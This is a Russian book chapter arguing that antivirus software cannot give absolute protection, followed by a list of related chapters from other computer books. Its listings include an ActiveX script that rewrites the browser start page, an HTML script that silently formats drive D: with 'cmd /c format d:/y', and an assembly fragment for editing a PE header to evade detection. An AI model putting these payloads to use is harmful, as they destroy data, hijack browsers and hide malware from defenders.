Антивирус

Антивирус

Нужен ли нам антивирус? «Конечно же, нужен, – скажет абсолютное большинство. – Как без антивируса-то? Чем же мы будем защищаться?».

Диски надо регулярно проверять? Вдруг "киберзараза" тихо сидит и ждет, а потом в определенный день и час отформатирует жесткий диск.

Проверять, разумеется, лучше всего регулярно – как минимум раз в неделю, как это советуют специалисты по компьютерной безопасности. Надо проверять все носители информации: само собой разумеется, жесткий диск, конечно же, дискеты, флэш-карты и обязательно компакт-диски – совсем не важно, что это займет у вас некоторое время, ведь безопасность превыше всего.

Обновление антивирусных баз – это вообще святое. Базы недельной давности – уже древние. Поэтому риск "подцепить заразу" со старыми базами очень велик, и это прописная истина. Выход – базы надо обновлять регулярно.

Время идет, и в один прекрасный момент у вашего антивируса заканчивается срок лицензии (если он не бесплатный, конечно), и "страж" выдает сообщение, что надо бы купить ключик, а то программа не будет полноценно работать. Ну что ж, выход есть – надо найти ключ.

Одного антивируса явно недостаточно! Все мы знаем, что для обеспечения мало-мальски приличного уровня безопасности надо установить два антивирусных продукта, а чтобы они не конфликтовали – на разные системы. Все верно.

Все было сделано правильно и работало на ура… Ничего не предвещало беды… пока в один прекрасный день система не легла-таки под новым вирусом неизвестного происхождения. Файлы были хитро переписаны вирусным кодом и/или жесткий диск зверски отформатирован. Но ведь все было сделано правильно!

Вариант 1. Вы «подцепили заразу» раньше, чем ее сигнатуры успели попасть в базы вашего антивируса, к тому же вирусом оказался не классический EXE-файл, а HTML-страница. Почему бы и нет?

Механизм работы такого вируса реализуется через уязвимости браузера при обработке ActiveX-объектов. Итак, начнем веселый некролог системе следующим образом (листинг 1.1).

Листинг 1.1. Устанавливаем стартовую страницу браузера

<APPLET ID="Sh1 "

CLASSID="CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B">

</APPLET>

<script>

Shl.RegWrite ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://fuckofflamers.ru");

</script>

Вариант 2. Звучит кощунственно: содержимое HTML-файла, подобно патологоанатому, методично «потрошит» винчестер. Невозможно? Еще как возможно! А вот и сценарий стартовой страницы (листинг 1.2).

Листинг 1.2. HTML-код, форматирующий диск D:

<script>

a=new ActiveXObject("WScript.Shell");

a.run("cmd /c format d:/y",0);

 </script>

Вышеописанный сценарий, внедренный злоумышленником в HTML-страницу, ни много ни мало незаметно форматирует диск, указанный в коде.

Продолжим веселый некролог.

Вариант 3. Система притормаживала, и на время игры в Counter Strike пользователь отключил антивирус. «Зараза» чувствует это и выполняет свою «культурную программу».

Вариант 4. Антивирус оказался беспомощным против нового упаковщика (упаковщик EXE-файлов, позволяющий скрыть исходный код вируса от антивирусной программы), к тому же PE-заголовок (часть EXE-файла, отвечающая за исполнение; в данном случае редактирование PE-заголовка выполнено с целью усложнения обнаружения антивирусом) вируса был мастерски отредактирован (листинг 1.3).

Листинг 1.3. Некоторый учебный пример модификации PE-заголовка

_PtchImSz:

mov eax, [esi + 0Ch] ; VirtualRVA(Last section)

add eax, [esi + 08h] ; VirtualSize(Last section)

mov [edi + 50h], eax

Вариант 5. «Зараза» успела отключить антивирус раньше, чем он ее обнаружил.

Эпикриз. Абсолютной защиты нет. Существующие варианты малоэффективны, занимают много времени и не способны обеспечить качественный уровень защиты.

Поделитесь на страничке

Следующая глава >

Похожие главы из других книг

7.1. Антивирус ClamAV

Из книги Fedora 8 Руководство пользователя автора Колисниченко Денис Николаевич

7.1. Антивирус ClamAV 7.1.1. Вирусы в Linux Первым делом нужно разрушить миф о том, что в Linux нет вирусов. Вирусы в Linux есть. По данным сайта www.virus-list.com для Linux написано всего 1111 вирусов (на момент написания этих строк). Почему "всего"? Потому что по данным того же www. viruslist.com всего вирусов


Антивирус ClamAV

Из книги 200 лучших программ для Linux автора Яремчук Сергей Акимович

Антивирус ClamAV Сегодня никого не нужно убеждать в необходимости использования антивируса для защиты компьютера. Антивирусные решения, предлагаемые для Linux, в основном ориентированы на серверы. Имея свою операционную систему, мир OpenSource не мог оставить незамеченной


«Антивирус Касперского»

Из книги Защита вашего компьютера автора Яремчук Сергей Акимович

«Антивирус Касперского» В 2007 году «Лабораторией Касперского» была выпущена новая версия известного антивируса – «Антивирус Касперского 7.0». Если в предыдущих версиях основной упор делался на сигнатурный поиск вирусов, то здесь разработчики используют все известные


3.1. Антивирус не панацея

Из книги Работа на ноутбуке автора Садовский Алексей

3.1. Антивирус не панацея Сегодня пользователи высказывают по поводу антивирусов различные мнения – от полной уверенности в защите до того, что главное – выдержать первый удар. Иногда антивирусы используются не столько как защита, сколько как средство оценки нанесенного


«Антивирус Касперского»

Из книги Защити свой компьютер на 100% от вирусов и хакеров автора Бойцев Олег Михайлович

«Антивирус Касперского» «Антивирус Касперского» разработан «Лабораторией Касперского» – российской компанией, занимающейся созданием средств защиты компьютера. Сегодня это один из лучших антивирусов, причем среди как отечественных разработок, так и зарубежных.


Антивирус

Из книги 200 лучших программ для Интернета. Популярный самоучитель автора Краинский И

Антивирус Нужен ли нам антивирус? «Конечно же, нужен, – скажет абсолютное большинство. – Как без антивируса-то? Чем же мы будем защищаться?».Диски надо регулярно проверять? Вдруг "киберзараза" тихо сидит и ждет, а потом в определенный день и час отформатирует жесткий


«Антивирус Касперского»

Из книги Работа в Интернете автора Макарский Дмитрий

«Антивирус Касперского» Производитель: ЗАО «Лаборатория Касперского» (http://www.kaspersky.ru).Статус: коммерческая.Страница для скачивания: http://www.kaspersky.ru/trials.Размер: 22,8 Мбайт.Существует определенный набор требований, которые современный пользователь предъявляет к антивирусным


«Антивирус Касперского»

Из книги Очень хороший самоучитель пользователя компьютером. Как самому устранить 90% неисправностей в компьютере и увеличить его возможности автора Колисниченко Денис Николаевич

«Антивирус Касперского» Основные характеристики:• официальный сайт программы – http://www.kaspersky.ru/;• размер дистрибутива – около 30 Мбайт;• условия использования – условно бесплатно, стоимость лицензии на один компьютер на один год – от 980 российских рублей;• язык


Антивирус Касперского

Из книги Интернет. Новые возможности. Трюки и эффекты [litres] автора Баловсяк Надежда Васильевна

Антивирус Касперского Даже не знаю, с чего начать рассмотрение этого антивируса, – настолько просто его использовать. С установки? Нет, там все просто. Разве что кроме одного момента. При установке можно выбрать компоненты программы, которые нужно установить. Среди


Антивирус Зайцева

Из книги Наглядный самоучитель работы на нетбуке автора Сенкевич Г. Е.

Антивирус Зайцева Почему именно этот антивирус? В свое время он мне очень помог. Мой компьютер был инфицирован сетевым червем. Вы только подумайте – я всего на десять минут отключил брандмауэр и Антивирус Касперского! Название червя я точно не помню, однако помню, что он


Выбираем антивирус

Из книги С компьютером на ты. Самое необходимое автора Егоров А. А.

Выбираем антивирус В настоящее время среди бесплатных программ можно выделить много достойных продуктов. Учитывая результаты официальных и неофициальных тестирований, а также собственный опыт, можно с уверенностью сказать, что абсолютной защиты нет. При определенных


Как установить антивирус?

Из книги Ubuntu 10. Краткое руководство пользователя автора Колисниченко Д. Н.

Как установить антивирус? Как правило, загруженные из Интернета файлы сохраняют в папке Загрузки внутри персональной папки пользователя. В этой папке оказался и дистрибутив программы Security Essentials, который мы скачали с сайта Microsoft в предыдущей главе.Нажмите кнопку Пуск.В


Как обновить антивирус?

Из книги Анонимность и безопасность в Интернете. От «чайника» к пользователю автора Колисниченко Денис Николаевич

Как обновить антивирус? Эффективность любой антивирусной программы во многом зависит от своевременного обновления ее компонентов. Антивирус Microsoft Security Essentials обновляется автоматически через Интернет, еженедельно получая с сайта компании Microsoft определения известных


3.3.2. Антивирус Касперского

Из книги автора

3.3.2. Антивирус Касперского Лаборатория Касперского уже давно зарекомендовала себя на рынке производителей антивирусов — существуют версии антивирусов как для домашних пользователей, так и для серверов и корпоративных клиентов. Для домашних пользователей и


25.5. Антивирус ClamAV

Из книги автора

25.5. Антивирус ClamAV 25.5.1. Вирусы и Linux Linux считается одной из самых безопасных операционных систем. Она устойчива, ее сетевые сервисы надежны и… для Linux существует очень мало вирусов. Почему? Давайте подумаем. Представим на некоторое время, что мы — вирусописатели. Для какой


7.3.2. Вкладка Антивирус

Из книги автора

7.3.2. Вкладка Антивирус Вкладка Антивирус позволяет управлять встроенным антивирусом (рис. 7.4). Первым делом нужно обновить вашу антивирусную базу, поэтому нажмите кнопку Обновить антивирусную базу – откроется окно обновления. Процедура обновления занимает совсем